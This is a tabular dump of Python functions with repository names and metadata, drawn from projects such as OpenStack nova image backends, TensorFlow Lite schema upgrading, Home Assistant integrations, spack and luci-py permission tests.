function
stringlengths
11
56k
repo_name
stringlengths
5
60
features
list
def _supports_encryption(self): # NOTE(dgenin): Kernel, ramdisk and disk.config are fetched using # the Raw backend regardless of which backend is configured for # ephemeral storage. Encryption for the Raw backend is not yet # implemented so this loophole is necessary to allow other # backends already supporting encryption to function. This can # be removed once encryption for Raw is implemented. if self.disk_name not in ['kernel', 'ramdisk', 'disk.config']: return False else: return True
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def create_image(self, prepare_template, base, size, *args, **kwargs):
    """Create the instance disk, either in place or from a cached base.

    :param prepare_template: callable that fetches/creates the template
    :param base: path of the cached base image
    :param size: desired virtual size in bytes (may be falsy)
    """
    filename = self._get_lock_name(base)

    # Serialized per-base-image so two instances cannot race on the cache.
    @utils.synchronized(filename, external=True, lock_path=self.lock_path)
    def copy_raw_image(base, target, size):
        libvirt_utils.copy_image(base, target)
        if size:
            # class Raw is misnamed, format may not be 'raw' in all cases
            image = imgmodel.LocalFileImage(target, self.driver_format)
            disk.extend(image, size)

    # No image_id means there is nothing to cache: generate directly.
    generating = 'image_id' not in kwargs
    if generating:
        if not self.check_image_exists():
            # Generating image in place
            prepare_template(target=self.path, *args, **kwargs)
    else:
        if not os.path.exists(base):
            prepare_template(target=base, max_size=size, *args, **kwargs)
        # NOTE(mikal): Update the mtime of the base file so the image
        # cache manager knows it is in use.
        libvirt_utils.update_mtime(base)
        self.verify_base_size(base, size)
        if not os.path.exists(self.path):
            with fileutils.remove_path_on_error(self.path):
                copy_raw_image(base, self.path, size)
    self.correct_format()
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def snapshot_extract(self, target, out_format):
    """Convert this image into a snapshot file at *target*.

    :param target: destination path for the converted image
    :param out_format: image format to convert to
    """
    images.convert_image(self.path, target, self.driver_format,
                         out_format)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def is_file_in_instance_path():
    # This backend stores the disk as a plain file under the instance
    # path (per the method name), so callers treat it as local-file data.
    return True
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def __init__(self, instance=None, disk_name=None, path=None):
    """Set up a qcow2 file-backed image.

    :param instance: instance the disk belongs to (used to derive the
        path when *path* is not given)
    :param disk_name: disk file name within the instance directory
    :param path: explicit path overriding the derived one
    """
    super(Qcow2, self).__init__("file", "qcow2", is_block_dev=False)

    self.path = (path or
                 os.path.join(libvirt_utils.get_instance_path(instance),
                              disk_name))
    # 'space' preallocation implies fully-allocated files, which makes
    # native I/O safe for this driver.
    self.preallocate = (
        strutils.to_slug(CONF.preallocate_images) == 'space')
    if self.preallocate:
        self.driver_io = "native"
    self.disk_info_path = os.path.join(os.path.dirname(self.path),
                                       'disk.info')
    self.resolve_driver_format()
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def copy_qcow2_image(base, target, size):
    """Create a qcow2 overlay at *target* backed by *base*, then grow it.

    :param base: backing file path
    :param target: overlay file to create
    :param size: desired virtual size in bytes; falsy means keep base size
    """
    # TODO(pbrady): Consider copying the cow image here
    # with preallocation=metadata set for performance reasons.
    # This would be keyed on a 'preallocate_images' setting.
    libvirt_utils.create_cow_image(base, target)
    if size:
        image = imgmodel.LocalFileImage(target, imgmodel.FORMAT_QCOW2)
        disk.extend(image, size)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def resize_image(self, size):
    """Grow the qcow2 file at self.path to *size* bytes."""
    disk.extend(
        imgmodel.LocalFileImage(self.path, imgmodel.FORMAT_QCOW2),
        size)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def is_file_in_instance_path():
    # Disk data lives as a regular file inside the instance path
    # (per the method name), so file-level operations apply.
    return True
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def escape(filename):
    """Return *filename* with every underscore doubled."""
    # Splitting on '_' and joining with '__' is equivalent to
    # filename.replace('_', '__').
    return '__'.join(filename.split('_'))
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def _supports_encryption(self):
    """This backend supports ephemeral-storage encryption."""
    return True
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def create_image(self, prepare_template, base, size, *args, **kwargs):
    """Create an LVM-backed (optionally dm-crypt encrypted) instance disk.

    :param prepare_template: callable that fetches/creates the template
    :param base: path of the cached base image
    :param size: desired size in bytes (may be falsy)
    """
    def encrypt_lvm_image():
        # Layers a dm-crypt mapping over the logical volume using the
        # key retrieved below.
        dmcrypt.create_volume(self.path.rpartition('/')[2],
                              self.lv_path,
                              CONF.ephemeral_storage_encryption.cipher,
                              CONF.ephemeral_storage_encryption.key_size,
                              key)

    filename = self._get_lock_name(base)

    # Serialized per-base-image so concurrent builds do not race.
    @utils.synchronized(filename, external=True, lock_path=self.lock_path)
    def create_lvm_image(base, size):
        base_size = disk.get_disk_size(base)
        self.verify_base_size(base, size, base_size=base_size)
        resize = size > base_size
        size = size if resize else base_size
        lvm.create_volume(self.vg, self.lv, size,
                          sparse=self.sparse)
        if self.ephemeral_key_uuid is not None:
            encrypt_lvm_image()
        # NOTE: by calling convert_image_unsafe here we're
        # telling qemu-img convert to do format detection on the input,
        # because we don't know what the format is. For example,
        # we might have downloaded a qcow2 image, or created an
        # ephemeral filesystem locally, we just don't know here. Having
        # audited this, all current sources have been sanity checked,
        # either because they're locally generated, or because they have
        # come from images.fetch_to_raw. However, this is major code smell.
        images.convert_image_unsafe(base, self.path, self.driver_format,
                                    run_as_root=True)
        if resize:
            disk.resize2fs(self.path, run_as_root=True)

    generated = 'ephemeral_size' in kwargs
    if self.ephemeral_key_uuid is not None:
        if 'context' in kwargs:
            try:
                # NOTE(dgenin): Key manager corresponding to the
                # specific backend catches and reraises an
                # an exception if key retrieval fails.
                key = self.key_manager.get_key(kwargs['context'],
                                               self.ephemeral_key_uuid
                                               ).get_encoded()
            except Exception:
                with excutils.save_and_reraise_exception():
                    LOG.error(_LE("Failed to retrieve ephemeral encryption"
                                  " key"))
        else:
            raise exception.NovaException(
                _("Instance disk to be encrypted but no context provided"))
    # Generate images with specified size right on volume
    if generated and size:
        lvm.create_volume(self.vg, self.lv, size,
                          sparse=self.sparse)
        with self.remove_volume_on_error(self.path):
            if self.ephemeral_key_uuid is not None:
                encrypt_lvm_image()
            prepare_template(target=self.path, *args, **kwargs)
    else:
        if not os.path.exists(base):
            prepare_template(target=base, max_size=size, *args, **kwargs)
        with self.remove_volume_on_error(self.path):
            create_lvm_image(base, size)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def resize_image(self, size):
    # Intentionally a no-op: presumably resizing is handled when the
    # volume is created -- TODO(review): confirm against the backend's
    # create_image path.
    pass
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def remove_volume_on_error(self, path):
    """Context manager: delete the volume at *path* if the body raises.

    NOTE(review): this is a generator used with `with`, so it assumes a
    @contextmanager decorator at the definition site (not visible here)
    -- confirm.
    """
    try:
        yield
    except Exception:
        # Re-raise the original error after best-effort cleanup.
        with excutils.save_and_reraise_exception():
            if self.ephemeral_key_uuid is None:
                lvm.remove_volumes([path])
            else:
                # Encrypted volumes carry a dm-crypt mapping that must be
                # torn down before the underlying LV is removed.
                dmcrypt.delete_volume(path.rpartition('/')[2])
                lvm.remove_volumes([self.lv_path])
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def get_model(self, connection):
    """Return an image model describing this local block device."""
    return imgmodel.LocalBlockImage(self.path)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def __init__(self, instance=None, disk_name=None, path=None, **kwargs):
    """Set up an RBD-backed image.

    :param instance: instance the disk belongs to (used to derive the
        RBD volume name when *path* is not given)
    :param disk_name: disk name within the instance
    :param path: explicit 'pool/volume' style path overriding derivation
    :raises exception.InvalidDevicePath: if *path* has no '/' component
    :raises RuntimeError: if no RBD pool is configured
    """
    super(Rbd, self).__init__("block", "rbd", is_block_dev=False)
    if path:
        try:
            self.rbd_name = path.split('/')[1]
        except IndexError:
            raise exception.InvalidDevicePath(path=path)
    else:
        self.rbd_name = '%s_%s' % (instance.uuid, disk_name)

    if not CONF.libvirt.images_rbd_pool:
        raise RuntimeError(_('You should specify'
                             ' images_rbd_pool'
                             ' flag to use rbd images.'))
    self.pool = CONF.libvirt.images_rbd_pool
    self.discard_mode = CONF.libvirt.hw_disk_discard
    self.rbd_user = CONF.libvirt.rbd_user
    self.ceph_conf = CONF.libvirt.images_rbd_ceph_conf

    self.driver = rbd_utils.RBDDriver(
        pool=self.pool,
        ceph_conf=self.ceph_conf,
        rbd_user=self.rbd_user)

    # Build the qemu-style rbd path, appending auth/conf options only
    # when they are configured.
    self.path = 'rbd:%s/%s' % (self.pool, self.rbd_name)
    if self.rbd_user:
        self.path += ':id=' + self.rbd_user
    if self.ceph_conf:
        self.path += ':conf=' + self.ceph_conf
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def _can_fallocate(self):
    # Not a local file, so filesystem-level fallocate preallocation
    # does not apply to this backend.
    return False
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def get_disk_size(self, name):
    """Returns the size of the virtual disk in bytes.

    The name argument is ignored since this backend already knows
    its name, and callers may pass a non-existent local file path.
    """
    return self.driver.size(self.rbd_name)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def resize_image(self, size):
    """Resize the RBD volume to *size* bytes via the driver."""
    self.driver.resize(self.rbd_name, size)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def is_shared_block_storage():
    # Volumes live in the storage cluster rather than on the local host,
    # so they are reachable from any compute node.
    return True
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def get_model(self, connection):
    """Build an imgmodel.RBDImage for this disk.

    :param connection: libvirt connection, used to resolve the Ceph
        auth secret when one is configured
    """
    secret = None
    if CONF.libvirt.rbd_secret_uuid:
        secretobj = connection.secretLookupByUUIDString(
            CONF.libvirt.rbd_secret_uuid)
        # NOTE(review): base64.b64encode returns bytes on Python 3;
        # confirm RBDImage accepts that (this code predates py3).
        secret = base64.b64encode(secretobj.value())

    hosts, ports = self.driver.get_mon_addrs()
    servers = [str(':'.join(k)) for k in zip(hosts, ports)]

    return imgmodel.RBDImage(self.rbd_name, self.pool, self.rbd_user,
                             secret, servers)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def create_snap(self, name):
    """Create an RBD snapshot of this volume named *name*."""
    return self.driver.create_snap(self.rbd_name, name)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def rollback_to_snap(self, name):
    """Roll this volume back to its snapshot *name*."""
    return self.driver.rollback_to_snap(self.rbd_name, name)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def direct_snapshot(self, context, snapshot_name, image_format,
                    image_id, base_image_id):
    """Creates an RBD snapshot directly.

    Snapshots the disk, clones it into Glance's pool, flattens the
    clone, and returns its rbd:// location URL.
    """
    fsid = self.driver.get_fsid()
    # NOTE(nic): Nova has zero comprehension of how Glance's image store
    # is configured, but we can infer what storage pool Glance is using
    # by looking at the parent image.  If using authx, write access should
    # be enabled on that pool for the Nova user
    parent_pool = self._get_parent_pool(context, base_image_id, fsid)

    # Snapshot the disk and clone it into Glance's storage pool.  librbd
    # requires that snapshots be set to "protected" in order to clone them
    self.driver.create_snap(self.rbd_name, snapshot_name, protect=True)
    location = {'url': 'rbd://%(fsid)s/%(pool)s/%(image)s/%(snap)s' %
                       dict(fsid=fsid,
                            pool=self.pool,
                            image=self.rbd_name,
                            snap=snapshot_name)}
    try:
        self.driver.clone(location, image_id, dest_pool=parent_pool)
        # Flatten the image, which detaches it from the source snapshot
        self.driver.flatten(image_id, pool=parent_pool)
    finally:
        # all done with the source snapshot, clean it up
        self.cleanup_direct_snapshot(location)

    # Glance makes a protected snapshot called 'snap' on uploaded
    # images and hands it out, so we'll do that too.  The name of
    # the snapshot doesn't really matter, this just uses what the
    # glance-store rbd backend sets (which is not configurable).
    self.driver.create_snap(image_id, 'snap', pool=parent_pool,
                            protect=True)
    return ('rbd://%(fsid)s/%(pool)s/%(image)s/snap' %
            dict(fsid=fsid, pool=parent_pool, image=image_id))
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def __init__(self, instance=None, disk_name=None, path=None):
    """Set up a ploop file-backed image.

    :param instance: instance owning the disk (used for path derivation)
    :param disk_name: disk name within the instance directory
    :param path: explicit path overriding the derived one
    """
    super(Ploop, self).__init__("file", "ploop", is_block_dev=False)

    self.path = (path or
                 os.path.join(libvirt_utils.get_instance_path(instance),
                              disk_name))
    self.resolve_driver_format()
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def create_ploop_image(base, target, size):
    """Copy *base* into a ploop container at *target* and optionally grow it.

    :param base: source image path
    :param target: ploop container directory
    :param size: desired size in bytes; falsy means keep the base size
    """
    image_path = os.path.join(target, "root.hds")
    libvirt_utils.copy_image(base, image_path)
    utils.execute('ploop', 'restore-descriptor', '-f', self.pcs_format,
                  target, image_path)
    if size:
        # NOTE(review): the descriptor is looked up under self.path while
        # the data was restored under *target* -- presumably these always
        # refer to the same directory; confirm.
        dd_path = os.path.join(self.path, "DiskDescriptor.xml")
        utils.execute('ploop', 'grow', '-s', '%dK' % (size >> 10),
                      dd_path, run_as_root=True)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def resize_image(self, size):
    """Grow the ploop disk to *size* bytes (passed to ploop in KiB)."""
    dd_path = os.path.join(self.path, "DiskDescriptor.xml")
    utils.execute('ploop', 'grow', '-s', '%dK' % (size >> 10), dd_path,
                  run_as_root=True)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def __init__(self, use_cow):
    """Map image-type names to backend classes.

    :param use_cow: when True the 'default' type resolves to Qcow2,
        otherwise to Raw.
    """
    self.BACKEND = {
        'raw': Raw,
        'qcow2': Qcow2,
        'lvm': Lvm,
        'rbd': Rbd,
        'ploop': Ploop,
        'default': Qcow2 if use_cow else Raw
    }
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def image(self, instance, disk_name, image_type=None):
    """Constructs image for selected backend.

    :param instance: Instance the image belongs to.
    :param disk_name: Image (disk) name.
    :param image_type: Image type.
        Optional, is CONF.libvirt.images_type by default.
    """
    backend = self.backend(image_type)
    return backend(instance=instance, disk_name=disk_name)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def setUp(self):
    """Create a fresh permissions.Builder and bind its helpers locally."""
    super(BuilderTest, self).setUp()
    self.builder = permissions.Builder('rev')
    # Shortcuts so tests can write self.permission(...) etc. directly.
    self.permission = self.builder.permission
    self.include = self.builder.include
    self.role = self.builder.role
luci/luci-py
[ 70, 40, 70, 82, 1427740754 ]
def test_empty(self):
    # A builder with nothing registered yields no permissions and no roles.
    self.check([], {})
luci/luci-py
[ 70, 40, 70, 82, 1427740754 ]
def test_bad_permission_name(self):
    # Permission names must have exactly three dot-separated components;
    # both too few and too many are rejected.
    with self.assertRaises(ValueError):
        self.permission('luci.dev')
    with self.assertRaises(ValueError):
        self.permission('luci.dev.something.something')
luci/luci-py
[ 70, 40, 70, 82, 1427740754 ]
def test_complex_role(self):
    # A role including another role expands to the union of both
    # roles' permissions.
    self.role('role/dev.a', [
        self.permission('luci.dev.p1'),
        self.permission('luci.dev.p2'),
    ])
    self.role('role/dev.b', [
        self.permission('luci.dev.p2'),
        self.permission('luci.dev.p3'),
        self.include('role/dev.a'),
    ])
    self.check(
        perms=['luci.dev.p1', 'luci.dev.p2', 'luci.dev.p3'],
        roles={
            'role/dev.a': ('luci.dev.p1', 'luci.dev.p2'),
            'role/dev.b': ('luci.dev.p1', 'luci.dev.p2', 'luci.dev.p3'),
        })
luci/luci-py
[ 70, 40, 70, 82, 1427740754 ]
def test_bad_role_name(self):
    # Role names outside the recognized prefixes are rejected.
    with self.assertRaises(ValueError):
        self.role('zzz/role', [])
luci/luci-py
[ 70, 40, 70, 82, 1427740754 ]
def test_non_idempotent_perm(self):
    # Re-declaring the same permission is fine, but re-declaring it with
    # different attributes (internal=True) must fail.
    self.permission('luci.dev.p1')
    self.permission('luci.dev.p1')
    with self.assertRaises(ValueError):
        self.permission('luci.dev.p1', internal=True)
luci/luci-py
[ 70, 40, 70, 82, 1427740754 ]
def test_can_be_built(self):
    # The bundled permissions DB builds, and its implicit root bindings
    # are well-formed Binding protos.
    db = permissions.db()
    for b in db.implicit_root_bindings('proj'):
        self.assertIsInstance(b, realms_config_pb2.Binding)
luci/luci-py
[ 70, 40, 70, 82, 1427740754 ]
def __init__(self):
    # Accumulates the comprehension nodes judged optimizable.
    self.result = set()
    super(OptimizableComprehension, self).__init__(Identifiers)
serge-sans-paille/pythran
[ 1865, 184, 1865, 122, 1338278534 ]
def visit_ListComp(self, node):
    """Record *node* as optimizable when its generators qualify."""
    if not self.check_comprehension(node.generators):
        return
    self.result.add(node)
serge-sans-paille/pythran
[ 1865, 184, 1865, 122, 1338278534 ]
def cmake_args(self):
    """Build the CMake argument list for casacore from the active spec."""
    args = []
    spec = self.spec

    args.append(self.define_from_variant('ENABLE_SHARED', 'shared'))
    args.append(self.define_from_variant('USE_OPENMP', 'openmp'))
    args.append(self.define_from_variant('USE_READLINE', 'readline'))
    args.append(self.define_from_variant('USE_HDF5', 'hdf5'))
    args.append(self.define_from_variant('USE_ADIOS2', 'adios2'))
    # MPI support is keyed off the adios2 variant as well.
    args.append(self.define_from_variant('USE_MPI', 'adios2'))
    if spec.satisfies('+adios2'):
        args.append(self.define('ENABLE_TABLELOCKING', False))

    # fftw3 is required by casacore starting with v3.4.0, but the
    # old fftpack is still available. For v3.4.0 and later, we
    # always require FFTW3 dependency with the optional addition
    # of FFTPack. In older casacore versions, only one of FFTW3 or
    # FFTPack can be selected.
    if spec.satisfies('@3.4.0:'):
        if spec.satisfies('+fftpack'):
            args.append('-DBUILD_FFTPACK_DEPRECATED=YES')
        args.append(self.define('USE_FFTW3', True))
    else:
        args.append(self.define('USE_FFTW3', spec.satisfies('~fftpack')))

    # Python2 and Python3 binding
    if spec.satisfies('~python'):
        args.extend(['-DBUILD_PYTHON=NO', '-DBUILD_PYTHON3=NO'])
    elif spec.satisfies('^python@3.0.0:'):
        args.extend(['-DBUILD_PYTHON=NO', '-DBUILD_PYTHON3=YES'])
    else:
        args.extend(['-DBUILD_PYTHON=YES', '-DBUILD_PYTHON3=NO'])

    args.append('-DBUILD_TESTING=OFF')
    return args
LLNL/spack
[ 3244, 1839, 3244, 2847, 1389172932 ]
def round_state(func):
    """Decorator: round a float return value to the nearest integer.

    Non-float return values are passed through unchanged.
    """
    import functools

    # Fix: preserve the wrapped function's metadata (__name__, __doc__)
    # so introspection and debugging see the original method.
    @functools.wraps(func)
    def _decorator(self):
        res = func(self)
        if isinstance(res, float):
            return round(res)
        return res

    return _decorator
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def __init__(self, coordinator, name, unique_id):
    """Initialize.

    :param coordinator: data update coordinator providing sensor data
    :param name: entity display name
    :param unique_id: stable unique identifier for this entity
    """
    self.coordinator = coordinator
    self._name = name
    self._unique_id = unique_id
    self._icon = "mdi:blur"
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def name(self):
    """Return the display name of the entity."""
    return self._name
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def should_poll(self):
    """Return the polling requirement of the entity.

    False: updates are pushed by the coordinator, not polled.
    """
    return False
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def icon(self):
    """Return the icon set at construction time."""
    return self._icon
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def air_quality_index(self):
    """Return the air quality index (CAQI) from coordinator data."""
    return self.coordinator.data[ATTR_API_CAQI]
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def particulate_matter_2_5(self):
    """Return the particulate matter 2.5 level from coordinator data."""
    return self.coordinator.data[ATTR_API_PM25]
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def particulate_matter_10(self):
    """Return the particulate matter 10 level from coordinator data."""
    return self.coordinator.data[ATTR_API_PM10]
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def attribution(self):
    """Return the data-source attribution string."""
    return ATTRIBUTION
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def unique_id(self):
    """Return a unique_id for this entity."""
    return self._unique_id
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def available(self):
    """Return True if entity is available.

    Mirrors the coordinator's last refresh outcome.
    """
    return self.coordinator.last_update_success
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def device_state_attributes(self):
    """Return extra state attributes derived from coordinator data.

    Percent values are rounded for display.
    """
    return {
        LABEL_AQI_DESCRIPTION: self.coordinator.data[ATTR_API_CAQI_DESCRIPTION],
        LABEL_ADVICE: self.coordinator.data[ATTR_API_ADVICE],
        LABEL_AQI_LEVEL: self.coordinator.data[ATTR_API_CAQI_LEVEL],
        LABEL_PM_2_5_LIMIT: self.coordinator.data[ATTR_API_PM25_LIMIT],
        LABEL_PM_2_5_PERCENT: round(self.coordinator.data[ATTR_API_PM25_PERCENT]),
        LABEL_PM_10_LIMIT: self.coordinator.data[ATTR_API_PM10_LIMIT],
        LABEL_PM_10_PERCENT: round(self.coordinator.data[ATTR_API_PM10_PERCENT]),
    }
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def context_managers(self, kwargs):
    """Pop "mode" from *kwargs* and return the matching context managers.

    Returns an empty list when no mode is requested; raises ValueError
    for an unrecognized mode.
    """
    requested = kwargs.pop("mode", None)
    if requested is None:
        return []
    if requested == "eager":
        return [context.eager_mode()]
    if requested == "graph":
        return [ops.Graph().as_default(), context.graph_mode()]
    raise ValueError(
        "Argument 'mode' must be either 'eager' or 'graph'. "
        f"Received: {requested}.")
tensorflow/tensorflow
[ 171949, 87931, 171949, 2300, 1446859160 ]
def should_execute_combination(self, kwargs):
    """Decide whether this combination runs under the active TF API.

    Pops "tf_api_version" from *kwargs*; returns (run?, skip-reason).
    """
    requested = kwargs.pop("tf_api_version", None)
    if requested == 1 and tf2.enabled():
        return (False, "Skipping a TF1.x test when TF2 is enabled.")
    if requested == 2 and not tf2.enabled():
        return (False, "Skipping a TF2 test when TF2 is not enabled.")
    return (True, None)
tensorflow/tensorflow
[ 171949, 87931, 171949, 2300, 1446859160 ]
def TemporaryDirectoryResource():
    # Generator used as a context manager yielding a fresh temp directory
    # and removing it on exit.  NOTE(review): assumes a
    # @contextlib.contextmanager decorator at the definition site (not
    # visible here) -- confirm.
    temporary = tempfile.mkdtemp()
    try:
        yield temporary
    finally:
        shutil.rmtree(temporary)
tensorflow/tensorflow
[ 171949, 87931, 171949, 2300, 1446859160 ]
def __init__(self):
  """Locate flatc and register the supported schema upgrade chain."""
  # TODO(aselle): make this work in the open source version with better
  # path.
  paths_to_try = [
      "../../../../flatbuffers/flatc",  # not bazel
      "../../../../external/flatbuffers/flatc"  # bazel
  ]
  for p in paths_to_try:
    self._flatc_path = resource_loader.get_path_to_datafile(p)
    if os.path.exists(self._flatc_path):
      break
  # NOTE(review): if neither path exists, _flatc_path silently keeps the
  # last candidate -- confirm callers tolerate a missing flatc.

  def FindSchema(base_name):
    return resource_loader.get_path_to_datafile("%s" % base_name)

  # Supported schemas for upgrade.  Tuples of
  # (version, schema path, upgradable?, upgrade function).
  self._schemas = [
      (0, FindSchema("schema_v0.fbs"), True, self._Upgrade0To1),
      (1, FindSchema("schema_v1.fbs"), True, self._Upgrade1To2),
      (2, FindSchema("schema_v2.fbs"), True, self._Upgrade2To3),
      (3, FindSchema("schema_v3.fbs"), False, None)  # Non-callable by design.
  ]
  # Ensure schemas are sorted, and extract latest version and upgrade
  # dispatch function table.
  self._schemas.sort()
  self._new_version, self._new_schema = self._schemas[-1][:2]
  self._upgrade_dispatch = {
      version: dispatch
      for version, unused1, unused2, dispatch in self._schemas}
tensorflow/tensorflow
[ 171949, 87931, 171949, 2300, 1446859160 ]
def _Write(self, data, output_file):
  """Output a json or bin version of the flatbuffer model.

  Args:
    data: Dict representing the TensorFlow Lite model to write.
    output_file: filename to write the converted flatbuffer to. (json,
      tflite, or bin extension is required).
  Raises:
    ValueError: When the extension is not json or bin.
    RuntimeError: When flatc fails to convert json data to binary.
  """
  _, extension = os.path.splitext(output_file)
  with TemporaryDirectoryResource() as tempdir:
    if extension == ".json":
      # Fix: the original passed open() directly to json.dump, leaking
      # the file handle; a with-block closes it deterministically.
      with open(output_file, "w") as fp:
        json.dump(data, fp, sort_keys=True, indent=2)
    elif extension in [".tflite", ".bin"]:
      input_json = os.path.join(tempdir, "temp.json")
      with open(input_json, "w") as fp:
        json.dump(data, fp, sort_keys=True, indent=2)
      returncode = subprocess.call([
          self._flatc_path, "-b", "--defaults-json", "--strict-json", "-o",
          tempdir, self._new_schema, input_json
      ])
      if returncode != 0:
        raise RuntimeError("flatc failed to convert upgraded json to binary.")
      shutil.copy(os.path.join(tempdir, "temp.tflite"), output_file)
    else:
      raise ValueError("Invalid extension on output file %r" % output_file)
tensorflow/tensorflow
[ 171949, 87931, 171949, 2300, 1446859160 ]
def _Upgrade1To2(self, data): """Upgrade data from Version 1 to Version 2. Changes: Rename operators to Conform to NN API. Args: data: Dictionary representing the TensorFlow lite data to be upgraded. This will be modified in-place to be an upgraded version. Raises: ValueError: Throws when model builtins are numeric rather than symbols. """ def RemapOperator(opcode_name): """Go from old schema op name to new schema op name. Args: opcode_name: String representing the ops (see :schema.fbs). Returns: Converted opcode_name from V1 to V2. """ old_name_to_new_name = { "CONVOLUTION": "CONV_2D", "DEPTHWISE_CONVOLUTION": "DEPTHWISE_CONV_2D", "AVERAGE_POOL": "AVERAGE_POOL_2D", "MAX_POOL": "MAX_POOL_2D", "L2_POOL": "L2_POOL_2D", "SIGMOID": "LOGISTIC", "L2NORM": "L2_NORMALIZATION", "LOCAL_RESPONSE_NORM": "LOCAL_RESPONSE_NORMALIZATION", "Basic_RNN": "RNN", } return (old_name_to_new_name[opcode_name] if opcode_name in old_name_to_new_name else opcode_name) def RemapOperatorType(operator_type): """Remap operator structs from old names to new names. Args: operator_type: String representing the builtin operator data type string. (see :schema.fbs). Raises: ValueError: When the model has consistency problems. Returns: Upgraded builtin operator data type as a string. """ old_to_new = { "PoolOptions": "Pool2DOptions", "DepthwiseConvolutionOptions": "DepthwiseConv2DOptions", "ConvolutionOptions": "Conv2DOptions", "LocalResponseNormOptions": "LocalResponseNormalizationOptions", "BasicRNNOptions": "RNNOptions", } return (old_to_new[operator_type] if operator_type in old_to_new else operator_type) for subgraph in data["subgraphs"]: for ops in subgraph["operators"]: ops["builtin_options_type"] = RemapOperatorType( ops["builtin_options_type"]) # Upgrade the operator codes for operator_code in data["operator_codes"]: # Check if builtin_code is the appropriate string type # use type("") instead of str or unicode. 
for py2and3 if not isinstance(operator_code["builtin_code"], type(u"")): raise ValueError("builtin_code %r is non-string. this usually means " "your model has consistency problems." % (operator_code["builtin_code"])) operator_code["builtin_code"] = (RemapOperator( operator_code["builtin_code"]))
tensorflow/tensorflow
[ 171949, 87931, 171949, 2300, 1446859160 ]
def _PerformUpgrade(self, data): """Manipulate the `data` (parsed JSON) based on changes in format. This incrementally will upgrade from version to version within data. Args: data: Dictionary representing the TensorFlow data. This will be upgraded in place. """ while data["version"] < self._new_version: self._upgrade_dispatch[data["version"]](data) data["version"] += 1
tensorflow/tensorflow
[ 171949, 87931, 171949, 2300, 1446859160 ]
def main(argv):
    """CLI entry point: convert FLAGS.input to FLAGS.output."""
    del argv  # unused; flags are read from FLAGS
    Converter().Convert(FLAGS.input, FLAGS.output)
tensorflow/tensorflow
[ 171949, 87931, 171949, 2300, 1446859160 ]
def __init__(self, hass, config_entry):
    """Initialize global Met data updater."""
    self._unsub_track_home = None
    self.weather = MetWeatherData(
        hass, config_entry.data, hass.config.units.is_metric
    )
    self.weather.init_data()

    # Randomize the interval (55-64 min) so many installs don't hit the
    # upstream API at the same moment.
    update_interval = timedelta(minutes=randrange(55, 65))

    super().__init__(hass, _LOGGER, name=DOMAIN, update_interval=update_interval)
tchellomello/home-assistant
[ 7, 1, 7, 6, 1467778429 ]
def track_home(self):
    """Start tracking changes to HA home setting."""
    # Already subscribed; don't register a second listener.
    if self._unsub_track_home:
        return

    async def _async_update_weather_data(_event=None):
        """Update weather data."""
        self.weather.init_data()
        await self.async_refresh()

    # Keep the unsubscribe callback so tracking can be stopped later.
    self._unsub_track_home = self.hass.bus.async_listen(
        EVENT_CORE_CONFIG_UPDATE, _async_update_weather_data
    )
tchellomello/home-assistant
[ 7, 1, 7, 6, 1467778429 ]
def __init__(self, hass, config, is_metric):
    """Initialise the weather entity data.

    :param hass: Home Assistant instance
    :param config: config-entry data for this integration
    :param is_metric: True when the installation uses metric units
    """
    self.hass = hass
    self._config = config
    self._is_metric = is_metric
    self._weather_data = None
    self.current_weather_data = {}
    self.daily_forecast = None
    self.hourly_forecast = None
tchellomello/home-assistant
[ 7, 1, 7, 6, 1467778429 ]
def forwards(self, orm):
awemulya/fieldsight-kobocat
[ 45, 7, 45, 26, 1481100851 ]
def backwards(self, orm):
awemulya/fieldsight-kobocat
[ 45, 7, 45, 26, 1481100851 ]
def _int64_feature(value):
    """Wrap a single int as a tf.train.Feature (int64_list)."""
    return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
unnikrishnankgs/va
[ 1, 5, 1, 10, 1496432585 ]
def main():
  """Main converter function.

  Reads the CelebA partition file, selects the images belonging to
  FLAGS.set, and writes them into a single TFRecord file.
  """
  # Celeb A
  with open(FLAGS.partition_fn, "r") as infile:
    img_fn_list = infile.readlines()
  img_fn_list = [elem.strip().split() for elem in img_fn_list]
  img_fn_list = [elem[0] for elem in img_fn_list if elem[1] == FLAGS.set]
